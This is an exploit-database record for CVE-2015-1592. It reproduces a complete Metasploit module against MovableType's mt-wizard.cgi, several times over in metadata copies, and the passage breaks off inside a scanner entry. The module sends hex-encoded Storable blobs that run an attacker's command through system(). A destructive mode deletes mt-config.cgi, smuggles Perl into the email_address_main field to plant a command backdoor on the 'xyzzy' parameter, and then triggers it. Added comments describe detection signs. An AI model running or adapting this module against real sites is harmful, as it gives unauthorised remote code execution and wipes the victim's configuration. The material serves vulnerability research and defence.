ID EDB-ID:41697 Type exploitdb Reporter Exploit-DB Modified 2015-02-11T00:00:00
Description
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit). CVE-2015-1592. Webapps exploit for Linux platform
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit module for CVE-2015-1592 (MovableType before 5.2.12 per the
# metadata below; the vendor advisory in 'References' also covers the 6.0.7
# release). The setup wizard's `config` parameter is handed to Perl's
# Storable::thaw, so a serialized blob supplied by the client controls which
# Perl classes get loaded and which hooks run. Every request here goes to
# mt-wizard.cgi (plus mt.cgi in the last destructive step) under TARGETURI,
# and no credentials are sent.
#
# Defensive notes, grounded in the requests this module sends:
#   * Remediation is the vendor fix named in the References URL; nothing in
#     this module works around or bypasses a configuration setting.
#   * Detection: GET requests to mt-wizard.cgi with __mode=retry&step=configure
#     and a long hex-encoded `config` value, or an application error containing
#     "Can't locate XXXCHECKXXX.pm", correspond to the probe in #check.
#   * DESTRUCTIVE=true rewrites and then unlinks mt-config.cgi; the target is
#     left without its configuration file (see #exploit_destructive).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options.
  #
  # 'Space' => 1024 is load-bearing: #exploit_nondestructive pads the injected
  # Perl with (1025 - payload.encoded.length) '#' bytes so the serialized
  # string keeps its declared length; a payload longer than 1025 bytes would
  # make that multiplier negative and raise ArgumentError. 'BadChars' => ' '
  # is presumably because the payload travels inside a GET query parameter.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SixApart MovableType Storable Perl Code Execution',
      'Description' => %q{
        This module exploits a serialization flaw in MovableType before 5.2.12 to execute
        arbitrary code. The default nondestructive mode depends on the target server having
        the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
        The destructive mode of operation uses only required MovableType dependencies,
        but it will noticeably corrupt the MovableType installation.
      },
      'Author' =>
        [
          'John Lightsey',
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2015-1592' ],
          [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
        ],
      'Privileged' => false, # web server context
      'Payload' =>
        {
          'DisableNops' => true,
          'BadChars' => ' ',
          'Space' => 1024,
        },
      'Compat' =>
        {
          'PayloadType' => 'cmd'
        },
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Targets' => [['Automatic', {}]],
      'DisclosureDate' => 'Feb 11 2015',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
        OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
      ], self.class
    )
  end

=begin
#!/usr/bin/perl
# generate config parameters for injection checks
use Storable;
{
    package XXXCHECKXXX;
    sub STORABLE_thaw {
        return 1;
    }
    sub STORABLE_freeze {
        return 1;
    }
}
my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
$frozen = unpack 'H*', $frozen;
print "LFI test for storable flaw is: $frozen\n";
{
    package DateTime;
    use overload '+' => sub { 'ignored' };
}
=end

  # Vulnerability probe. Sends the hex blob printed by the Perl generator
  # above: a Storable structure blessed into a class (XXXCHECKXXX) that cannot
  # exist on the target. A 200 response whose body contains Perl's
  # "Can't locate XXXCHECKXXX.pm" load error shows the server attempted to
  # load a class named inside client-supplied data, i.e. `config` reaches
  # Storable::thaw unfiltered. Anything else, including a transport failure
  # (res is nil), is reported as Safe.
  def check
    vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step' => 'configure',
        'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
      }
    })

    unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
      vprint_status("Failed XXXCHECKXXX.pm load test");
      return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Vulnerable
  end

  # Entry point: dispatches on the DESTRUCTIVE option (default false, see
  # register_options).
  def exploit
    if datastore['DESTRUCTIVE']
      exploit_destructive
    else
      exploit_nondestructive
    end
  end

=begin
#!/usr/bin/perl
# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.
use Storable;
{
    package Object::MultiType;
    use overload '+' => sub { 'ingored' };
}
{
    package Object::MultiType::Saver;
}
{
    package DateTime;
    use overload '+' => sub { 'ingored' };
}
{
    package Try::Tiny::ScopeGuard;
}
my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";
=end

  # Nondestructive path. Needs Object::MultiType and DateTime on the target
  # (see 'Description'). config_payload is the blob printed by the generator
  # above, cut just after `system(q{`; the command payload is hex-encoded and
  # spliced in, followed by the hex of "});", then '#' (0x23) padding, then
  # "\nexit;". The generator used an empty q{} with '#' x 1025, so padding to
  # (1025 - payload length) keeps the string at the length the serialized
  # blob declares — this is why 'Space' is capped at 1024 in #initialize.
  # The request uses a 5 s timeout and its response is not inspected;
  # presumably success is judged by the session the payload opens.
  def exploit_nondestructive
    print_status("Using nondestructive attack method")
    config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
    config_payload << payload.encoded.unpack('H*')[0]
    config_payload << "7d293b"
    config_payload << "23" * (1025 - payload.encoded.length)
    config_payload << "0a657869743b"

    print_status("Sending payload (#{payload.raw.length} bytes)")

    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step' => 'configure',
        'config' => config_payload
      }
    }, 5)
  end

=begin
#!/usr/bin/perl
# Generate destructive config parameter to unlink mt-config.cgi
use Storable;
{
    package CGITempFile;
}
my $unlink_target = "mt-config.cgi";
my $cgitempfile = bless \$unlink_target, "CGITempFile";
my $data = [$cgitempfile];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE unlink payload requiring CGI: $frozen\n";
=end

  # Destructive path (DESTRUCTIVE=true); relies only on CGI, which MovableType
  # already requires. Three requests:
  #   1. The generator's blob above, blessing "mt-config.cgi" into
  #      CGITempFile, so the target removes its own configuration file.
  #   2. A wizard step (__mode=next_step, step=optional) whose
  #      email_address_main value carries a line break followed by Perl;
  #      presumably the wizard writes it verbatim into the regenerated
  #      mt-config.cgi. That Perl runs the `xyzzy` query parameter through
  #      system() and then unlinks mt-config.cgi again.
  #   3. GET mt.cgi?xyzzy=<payload> to trigger it (5 s timeout, response
  #      not inspected).
  # Steps 1 and 2 fail_with unless the server answers 200. The installation
  # is left without mt-config.cgi, which is the corruption the DESTRUCTIVE
  # option description warns about.
  def exploit_destructive
    print_status("Using destructive attack method")
    # First we need to delete mt-config.cgi using the storable injection

    print_status("Sending storable injection to unlink mt-config.cgi")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step' => 'configure',
        'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
      }
    })

    if res && res.code == 200
      print_status("Successfully sent unlink request")
    else
      fail_with(Failure::Unknown, "Error sending unlink request")
    end

    # Now we rewrite mt-config.cgi to accept a payload

    print_status("Rewriting mt-config.cgi to accept the payload")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'next_step',
        'step' => 'optional',
        'default_language' => 'en_us',
        'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
        'set_static_uri_to' => '/',
        'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
      }
    })

    if res && res.code == 200
      print_status("Successfully sent mt-config rewrite request")
    else
      fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
    end

    # Finally send the payload

    print_status("Sending payload request")

    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
      'vars_get' => {
        'xyzzy' => payload.encoded,
      }
    }, 5)
  end
end
{"id": "EDB-ID:41697", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)", "description": "SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit). CVE-2015-1592. Webapps exploit for Linux platform", "published": "2015-02-11T00:00:00", "modified": "2015-02-11T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://www.exploit-db.com/exploits/41697/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2015-1592"], "lastseen": "2017-03-23T13:16:58", "viewCount": 3, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2017-03-23T13:16:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1592"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/SIXAPART_MOVABLETYPE_STORABLE_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131860"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805357", "OPENVAS:1361412562310703183", "OPENVAS:703183"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3183-1:59B04"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31849", "SECURITYVULNS:VULN:14346"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-3183.NASL"]}], "modified": "2017-03-23T13:16:58", "rev": 2}, "vulnersScore": 7.1}, "sourceHref": "https://www.exploit-db.com/download/41697/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SixApart MovableType Storable Perl Code Execution',\r\n 'Description' => %q{\r\n This module exploits a serialization flaw in MovableType before 5.2.12 to execute\r\n 
arbitrary code. The default nondestructive mode depends on the target server having\r\n the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.\r\n The destructive mode of operation uses only required MovableType dependencies,\r\n but it will noticeably corrupt the MovableType installation.\r\n },\r\n 'Author' =>\r\n [\r\n 'John Lightsey',\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-1592' ],\r\n [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],\r\n ],\r\n 'Privileged' => false, # web server context\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => ' ',\r\n 'Space' => 1024,\r\n },\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [['Automatic', {}]],\r\n 'DisclosureDate' => 'Feb 11 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),\r\n OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])\r\n ], self.class\r\n )\r\n\r\n end\r\n\r\n=begin\r\n#!/usr/bin/perl\r\n# generate config parameters for injection checks\r\nuse Storable;\r\n{\r\n package XXXCHECKXXX;\r\n sub STORABLE_thaw {\r\n return 1;\r\n }\r\n sub STORABLE_freeze {\r\n return 1;\r\n }\r\n}\r\nmy $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;\r\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . 
Storable::freeze({ x => $check_obj});\r\n$frozen = unpack 'H*', $frozen;\r\nprint \"LFI test for storable flaw is: $frozen\\n\";\r\n{\r\n package DateTime;\r\n use overload '+' => sub { 'ignored' };\r\n}\r\n=end\r\n\r\n def check\r\n vprint_status(\"Sending storable test injection for XXXCHECKXXX.pm load failure\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'retry',\r\n 'step' => 'configure',\r\n 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'\r\n }\r\n })\r\n\r\n unless res && res.code == 200 && res.body.include?(\"Can't locate XXXCHECKXXX.pm\")\r\n vprint_status(\"Failed XXXCHECKXXX.pm load test\");\r\n return Exploit::CheckCode::Safe\r\n end\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if datastore['DESTRUCTIVE']\r\n exploit_destructive\r\n else\r\n exploit_nondestructive\r\n end\r\n end\r\n\r\n=begin\r\n#!/usr/bin/perl\r\n# Generate nondestructive config parameter for RCE via Object::MultiType\r\n# and Try::Tiny. The generated value requires minor modification to insert\r\n# the payload inside the system() call and resize the padding.\r\nuse Storable;\r\n{\r\n package Object::MultiType;\r\n use overload '+' => sub { 'ingored' };\r\n}\r\n{\r\n package Object::MultiType::Saver;\r\n}\r\n{\r\n package DateTime;\r\n use overload '+' => sub { 'ingored' };\r\n}\r\n{\r\n package Try::Tiny::ScopeGuard;\r\n}\r\nmy $try_tiny_loader = bless {}, 'DateTime';\r\nmy $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';\r\nmy $multitype_coderef = bless \\$multitype_saver, 'Object::MultiType';\r\nmy $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\\n\\n};system(q{});' . ('#' x 1025) . \"\\nexit;\"], 'Try::Tiny::ScopeGuard';\r\nmy $data = [$try_tiny_loader, $try_tiny_executor];\r\nmy $frozen = 'SERG' . pack( 'N', 0 ) . 
pack( 'N', 3 ) . Storable::freeze($data);\r\n$frozen = unpack 'H*', $frozen;\r\nprint \"RCE payload requiring Object::MultiType and DateTime: $frozen\\n\";\r\n=end\r\n\r\n def exploit_nondestructive\r\n print_status(\"Using nondestructive attack method\")\r\n config_payload = \"53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b\"\r\n config_payload << payload.encoded.unpack('H*')[0]\r\n config_payload << \"7d293b\"\r\n config_payload << \"23\" * (1025 - payload.encoded.length)\r\n config_payload << \"0a657869743b\"\r\n\r\n print_status(\"Sending payload (#{payload.raw.length} bytes)\")\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'retry',\r\n 'step' => 'configure',\r\n 'config' => config_payload\r\n }\r\n }, 5)\r\n end\r\n\r\n=begin\r\n#!/usr/bin/perl\r\n# Generate destructive config parameter to unlink mt-config.cgi\r\nuse Storable;\r\n{\r\n package CGITempFile;\r\n}\r\nmy $unlink_target = \"mt-config.cgi\";\r\nmy $cgitempfile = bless \\$unlink_target, \"CGITempFile\";\r\nmy $data = [$cgitempfile];\r\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . 
Storable::freeze($data);\r\n$frozen = unpack 'H*', $frozen;\r\nprint \"RCE unlink payload requiring CGI: $frozen\\n\";\r\n=end\r\n\r\n def exploit_destructive\r\n print_status(\"Using destructive attack method\")\r\n # First we need to delete mt-config.cgi using the storable injection\r\n\r\n print_status(\"Sending storable injection to unlink mt-config.cgi\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'retry',\r\n 'step' => 'configure',\r\n 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'\r\n }\r\n })\r\n\r\n if res && res.code == 200\r\n print_status(\"Successfully sent unlink request\")\r\n else\r\n fail_with(Failure::Unknown, \"Error sending unlink request\")\r\n end\r\n\r\n # Now we rewrite mt-config.cgi to accept a payload\r\n\r\n print_status(\"Rewriting mt-config.cgi to accept the payload\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'next_step',\r\n 'step' => 'optional',\r\n 'default_language' => 'en_us',\r\n 'email_address_main' => \"x\\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\\\n\\\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1\",\r\n 'set_static_uri_to' => '/',\r\n 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',\r\n }\r\n })\r\n\r\n if res && res.code == 200\r\n print_status(\"Successfully sent mt-config rewrite request\")\r\n else\r\n fail_with(Failure::Unknown, \"Error sending mt-config rewrite request\")\r\n end\r\n\r\n # Finally send the payload\r\n\r\n print_status(\"Sending payload request\")\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => 
normalize_uri(target_uri.path, 'mt.cgi'),\r\n 'vars_get' => {\r\n 'xyzzy' => payload.encoded,\r\n }\r\n }, 5)\r\n end\r\n\r\nend", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T06:21:21", "description": "Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7 does not properly use the Perl Storable::thaw function, which allows remote attackers to include and execute arbitrary local Perl files and possibly execute arbitrary code via unspecified vectors.", "edition": 10, "cvss3": {}, "published": "2015-02-19T15:59:00", "title": "CVE-2015-1592", "type": "cve", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1592"], "modified": "2019-10-09T00:20:00", "cpe": ["cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2015-1592", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1592", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:20", "description": "", "published": "2015-05-11T00:00:00", "type": "packetstorm", "title": "SixApart MovableType Storable Perl Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1592"], "modified": "2015-05-11T00:00:00", "id": "PACKETSTORM:131860", "href": "https://packetstormsecurity.com/files/131860/SixApart-MovableType-Storable-Perl-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank 
= GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SixApart MovableType Storable Perl Code Execution', \n'Description' => %q{ \nThis module exploits a serialization flaw in MovableType before 5.2.12 to execute \narbitrary code. The default nondestructive mode depends on the target server having \nthe Object::MultiType and DateTime Perl modules installed in Perl's @INC paths. \nThe destructive mode of operation uses only required MovableType dependencies, \nbut it will noticeably corrupt the MovableType installation. \n}, \n'Author' => \n[ \n'John Lightsey', \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-1592' ], \n[ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ], \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'BadChars' => ' ', \n'Space' => 1024, \n}, \n'Compat' => \n{ \n'PayloadType' => 'cmd' \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Targets' => [['Automatic', {}]], \n'DisclosureDate' => 'Feb 11 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']), \nOptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false]) \n], self.class \n) \n \nend \n \n=begin \n \n#!/usr/bin/perl \n \n# generate config parameters for injection checks \n \nuse Storable; \n \n{ \n \npackage XXXCHECKXXX; \n \nsub STORABLE_thaw { \nreturn 1; \n} \n \nsub STORABLE_freeze { \nreturn 1; \n} \n \n} \n \nmy $check_obj = bless { ignore => 'this' }, XXXCHECKXXX; \nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . 
Storable::freeze({ x => $check_obj}); \n$frozen = unpack 'H*', $frozen; \nprint \"LFI test for storable flaw is: $frozen\\n\"; \n \n{ \npackage DateTime; \nuse overload '+' => sub { 'ignored' }; \n} \n \n=end \n \ndef check \nvprint_status(\"#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'retry', \n'step' => 'configure', \n'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078' \n} \n}) \n \nunless res && res.code == 200 && res.body.include?(\"Can't locate XXXCHECKXXX.pm\") \nvprint_status(\"#{peer} - Failed XXXCHECKXXX.pm load test\"); \nreturn Exploit::CheckCode::Safe \nend \nExploit::CheckCode::Vulnerable \nend \n \ndef exploit \nif datastore['DESTRUCTIVE'] == true \nexploit_destructive \nelse \nexploit_nondestructive \nend \nend \n \n=begin \n \n#!/usr/bin/perl \n \n# Generate nondestructive config parameter for RCE via Object::MultiType \n# and Try::Tiny. The generated value requires minor modification to insert \n# the payload inside the system() call and resize the padding. \n \nuse Storable; \n \n{ \npackage Object::MultiType; \nuse overload '+' => sub { 'ingored' }; \n} \n \n{ \npackage Object::MultiType::Saver; \n} \n \n{ \npackage DateTime; \nuse overload '+' => sub { 'ingored' }; \n} \n \n{ \npackage Try::Tiny::ScopeGuard; \n} \n \nmy $try_tiny_loader = bless {}, 'DateTime'; \nmy $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver'; \nmy $multitype_coderef = bless \\$multitype_saver, 'Object::MultiType'; \nmy $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\\n\\n};system(q{});' . ('#' x 1025) . \"\\nexit;\"], 'Try::Tiny::ScopeGuard'; \n \nmy $data = [$try_tiny_loader, $try_tiny_executor]; \nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . 
Storable::freeze($data); \n$frozen = unpack 'H*', $frozen; \nprint \"RCE payload requiring Object::MultiType and DateTime: $frozen\\n\"; \n \n=end \n \ndef exploit_nondestructive \nprint_status(\"#{peer} - Using nondestructive attack method\") \nconfig_payload = \"53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b\" \nconfig_payload << payload.encoded.unpack('H*')[0] \nconfig_payload << \"7d293b\" \nconfig_payload << \"23\" * (1025 - payload.encoded.length) \nconfig_payload << \"0a657869743b\" \n \nprint_status(\"#{peer} - Sending payload (#{payload.raw.length} bytes)\") \n \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'retry', \n'step' => 'configure', \n'config' => config_payload \n} \n}, 5) \nend \n \n=begin \n \n#!/usr/bin/perl \n \n# Generate destructive config parameter to unlink mt-config.cgi \n \nuse Storable; \n \n{ \npackage CGITempFile; \n} \n \nmy $unlink_target = \"mt-config.cgi\"; \nmy $cgitempfile = bless \\$unlink_target, \"CGITempFile\"; \n \nmy $data = [$cgitempfile]; \nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . 
Storable::freeze($data); \n$frozen = unpack 'H*', $frozen; \nprint \"RCE unlink payload requiring CGI: $frozen\\n\"; \n \n=end \n \ndef exploit_destructive \nprint_status(\"#{peer} - Using destructive attack method\") \n# First we need to delete mt-config.cgi using the storable injection \n \nprint_status(\"#{peer} - Sending storable injection to unlink mt-config.cgi\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'retry', \n'step' => 'configure', \n'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769' \n} \n}) \n \nif res && res.code == 200 \nprint_status(\"Successfully sent unlink request\") \nelse \nfail_with(Failure::Unknown, \"Error sending unlink request\") \nend \n \n# Now we rewrite mt-config.cgi to accept a payload \n \nprint_status(\"#{peer} - Rewriting mt-config.cgi to accept the payload\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'next_step', \n'step' => 'optional', \n'default_language' => 'en_us', \n'email_address_main' => \"x\\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\\\n\\\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1\", \n'set_static_uri_to' => '/', \n'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/', \n} \n}) \n \nif res && res.code == 200 \nprint_status(\"Successfully sent mt-config rewrite request\") \nelse \nfail_with(Failure::Unknown, \"Error sending mt-config rewrite request\") \nend \n \n# Finally send the payload \n \nprint_status(\"#{peer} - Sending payload request\") \n \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt.cgi'), \n'vars_get' => { \n'xyzzy' => 
payload.encoded, \n} \n}, 5) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131860/sixapart_movabletype_storable_exec.rb.txt"}], "openvas": [{"lastseen": "2019-05-29T18:37:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1592"], "description": "The host is installed with movable type\n and is prone to arbitrary file upload vulnerability.", "modified": "2018-12-21T00:00:00", "published": "2015-04-10T00:00:00", "id": "OPENVAS:1361412562310805357", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805357", "type": "openvas", "title": "Movable Type Local File Inclusion Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_movable_type_local_file_inclusion_vuln.nasl 12861 2018-12-21 09:53:04Z ckuersteiner $\n#\n# Movable Type Local File Inclusion Vulnerability\n#\n# Authors:\n# Deependra Bapna <bdeepednra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will 